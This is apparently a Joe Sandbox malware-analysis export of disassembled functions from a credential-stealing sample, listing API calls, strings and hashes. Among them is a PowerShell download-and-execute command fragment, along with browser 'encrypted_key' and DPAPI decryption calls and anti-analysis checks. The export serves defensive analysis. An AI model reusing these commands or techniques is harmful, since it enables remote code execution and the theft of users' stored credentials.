                                  • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                  APIs
                                  • __getptd.LIBCMT ref: 022FCC51
                                    • Part of subcall function 022FC206: __getptd_noexit.LIBCMT ref: 022FC209
                                    • Part of subcall function 022FC206: __amsg_exit.LIBCMT ref: 022FC216
                                  • __amsg_exit.LIBCMT ref: 022FCC71
                                  • __lock.LIBCMT ref: 022FCC81
                                  • InterlockedDecrement.KERNEL32(?), ref: 022FCC9E
                                  • free.MSVCRT ref: 022FCCB1
                                  • InterlockedIncrement.KERNEL32(0042B980), ref: 022FCCC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                  • String ID:
                                  • API String ID: 634100517-0
                                  • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                  • Instruction ID: a012a0e43daee45e6e01f8dacfb5f3dfedba2cf864c4fd68e2ce1a776dc9ee4b
                                  • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                  • Instruction Fuzzy Hash: 3201AD32A21B2AABC7A1EBE5944475DF760BF08714F404137EE14672A8CB646441DFD9
                                  APIs
                                  • __getptd.LIBCMT ref: 0041C9EA
                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                  • __amsg_exit.LIBCMT ref: 0041CA0A
                                  • __lock.LIBCMT ref: 0041CA1A
                                  • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                  • free.MSVCRT ref: 0041CA4A
                                  • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                  • String ID:
                                  • API String ID: 634100517-0
                                  • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                  • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                  • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                  • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                  APIs
                                  • strlen.MSVCRT ref: 022F7186
                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,022F7401,00000000,00420BA8,00000000,00000000), ref: 022F71B4
                                    • Part of subcall function 022F6E37: strlen.MSVCRT ref: 022F6E48
                                    • Part of subcall function 022F6E37: strlen.MSVCRT ref: 022F6E6C
                                  • VirtualQueryEx.KERNEL32(022F7574,00000000,?,0000001C), ref: 022F71F9
                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022F7401), ref: 022F731A
                                    • Part of subcall function 022F7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 022F705F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                  • String ID: @
                                  • API String ID: 2950663791-2766056989
                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                  • Instruction ID: b4bd8eeb78bb4ede988fa66102ea3c19b05c5bbe284d5346f78080d630e382af
                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                  • Instruction Fuzzy Hash: A351F8B1D1010AEBDB44CFD8D981AEFF7B6BF88304F048529FA15A7244D774AA11CBA1
                                  APIs
                                  • strlen.MSVCRT ref: 00416F1F
                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                    • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                  • String ID: @
                                  • API String ID: 2950663791-2766056989
                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                  • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                  • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                  APIs
                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: *n@$*n@
                                  • API String ID: 1029625771-193229609
                                  • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                  • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                  • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                  • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                  APIs
                                  • lstrcat.KERNEL32(?,0064A30C), ref: 022F4A42
                                    • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F4A68
                                  • lstrcat.KERNEL32(?,?), ref: 022F4A87
                                  • lstrcat.KERNEL32(?,?), ref: 022F4A9B
                                  • lstrcat.KERNEL32(?,0064A284), ref: 022F4AAE
                                  • lstrcat.KERNEL32(?,?), ref: 022F4AC2
                                  • lstrcat.KERNEL32(?,0064A2C8), ref: 022F4AD6
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022F8FF7: GetFileAttributesA.KERNEL32(00000000,?,022E1DBB,?,?,0042565C,?,?,00420E1F), ref: 022F9006
                                    • Part of subcall function 022F47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022F47E7
                                    • Part of subcall function 022F47D7: RtlAllocateHeap.NTDLL(00000000), ref: 022F47EE
                                    • Part of subcall function 022F47D7: wsprintfA.USER32 ref: 022F480D
                                    • Part of subcall function 022F47D7: FindFirstFileA.KERNEL32(?,?), ref: 022F4824
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                  • Instruction ID: 847f116a5f48ac333e99bcda6484a6307a634ab994cc7fd3dee504f637593392
                                  • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                  • Instruction Fuzzy Hash: C83193BA9503086BDB50FBF0CC84EEDB37AAB48700F4045D9B34596084DEB49789CF95
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                  Strings
                                  • <, xrefs: 00412D39
                                  • ')", xrefs: 00412CB3
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 5f8ae31bfa9754787a169228238118935e8d59a2c42068384eb8c8c7280cf3ad
                                  • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                  • Opcode Fuzzy Hash: 5f8ae31bfa9754787a169228238118935e8d59a2c42068384eb8c8c7280cf3ad
                                  • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022E14A5
                                  • __aulldiv.LIBCMT ref: 022E14BF
                                  • __aulldiv.LIBCMT ref: 022E14CD
                                  • ExitProcess.KERNEL32 ref: 022E14FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                  • Instruction ID: 59a76208ba74fbd1e2a55642bedbe2d77768888a787a1a4f4721aeff0056f913
                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                  • Instruction Fuzzy Hash: F7016DB0960308BAEF10DBD0CC89B9DBBB9AF00705F608468E70A7B2C4D7B499418B55
                                  APIs
                                  • memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022F0CC7: memset.MSVCRT ref: 022F0E83
                                    • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00000000), ref: 022F0E9C
                                    • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 022F0EAE
                                    • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00000000), ref: 022F0EC4
                                    • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00420D80), ref: 022F0ED6
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • memcmp.MSVCRT(?,00421114,00000003), ref: 022EA116
                                  • memset.MSVCRT ref: 022EA14F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 022EA1A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                  • String ID: @
                                  • API String ID: 1977917189-2766056989
                                  • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                  • Instruction ID: 4d61889b6cc6cf9a28471d0d720ec13aac3e0ea3a00a72f8ef000fee25e76126
                                  • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                  • Instruction Fuzzy Hash: 66613F316203489BDF24EFE4CD96FDD7776AF44704F408128EA0A5B694DBB46A05CF51
                                  APIs
                                  • strtok_s.MSVCRT ref: 00410DB8
                                  • strtok_s.MSVCRT ref: 00410EFD
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00883680,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strtok_s$lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 348468850-0
                                  • Opcode ID: d0f1ba5d55cb1b253890ed9ee11e6a313e4eedd3fb9c312bac6e1a9e739fb82b
                                  • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                  • Opcode Fuzzy Hash: d0f1ba5d55cb1b253890ed9ee11e6a313e4eedd3fb9c312bac6e1a9e739fb82b
                                  • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                  • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                    • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                    • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                    • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                    • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 3731072634-738592651
                                  • Opcode ID: b97104fd662995cfad6d6c7205974953a7702af5bf03f7cdde88330e3a2931d4
                                  • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                  • Opcode Fuzzy Hash: b97104fd662995cfad6d6c7205974953a7702af5bf03f7cdde88330e3a2931d4
                                  • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CodeInfoPageValidmemset
                                  • String ID:
                                  • API String ID: 703783727-0
                                  • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                  • Instruction ID: 4a5e80101a10a497395bbe7b4346c7445c58e1068825383f797269a4bf34c7f1
                                  • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                  • Instruction Fuzzy Hash: 1C312B31A2429A9ED7A5CFB4C854279FFA09B05314B1942BBDA81CF199D768C405C751
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 022F6BD3
                                  • sscanf.NTDLL ref: 022F6C00
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022F6C19
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022F6C27
                                  • ExitProcess.KERNEL32 ref: 022F6C41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                  • Instruction ID: be7223b989078f18044266b5138ef5a6c30e201ba90e43929f2d1fe9ff28c260
                                  • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                  • Instruction Fuzzy Hash: 8921EBB5D14209AFCF48EFE4D9459EEB7BAFF48300F04852EE516A3254EB345604CB65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F809E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F80A5
                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 022F80C5
                                  • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 022F80E6
                                  • RegCloseKey.ADVAPI32(?), ref: 022F80F9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                  • Instruction ID: a96c1d8170eca9f8ab5161e618ed699f30b4f09bbf2a98c685518c80326c3dd5
                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                  • Instruction Fuzzy Hash: 0A113DB5A94209BBD710CFD4DD4AFBBF7B9EB05710F104219F615A7290C7B558008BA2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                  • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,00885FD8,00000000,00020119,?), ref: 00417E5E
                                  • RegQueryValueExA.ADVAPI32(?,0088B108,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3466090806-0
                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                  • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                  • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F799B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F79A2
                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,022F7920), ref: 022F79C2
                                  • RegQueryValueExA.ADVAPI32(022F7920,00420AAC,00000000,00000000,?,000000FF), ref: 022F79E1
                                  • RegCloseKey.ADVAPI32(022F7920), ref: 022F79EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                  • Instruction ID: 9f149a9607a88dc5d162e52cf35de991a2837788ad5084777602d06450776d22
                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                  • Instruction Fuzzy Hash: 0401FFB9A80308BFEB10DFE4DD4AFAEB7B9EB48701F104559FA05A7284D67596008F52
                                  APIs
                                  • StrStrA.SHLWAPI(0088A4E0,?,?,?,0041140C,?,0088A4E0,00000000), ref: 0041926C
                                  • lstrcpyn.KERNEL32(0064AB88,0088A4E0,0088A4E0,?,0041140C,?,0088A4E0), ref: 00419290
                                  • lstrlenA.KERNEL32(?,?,0041140C,?,0088A4E0), ref: 004192A7
                                  • wsprintfA.USER32 ref: 004192C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
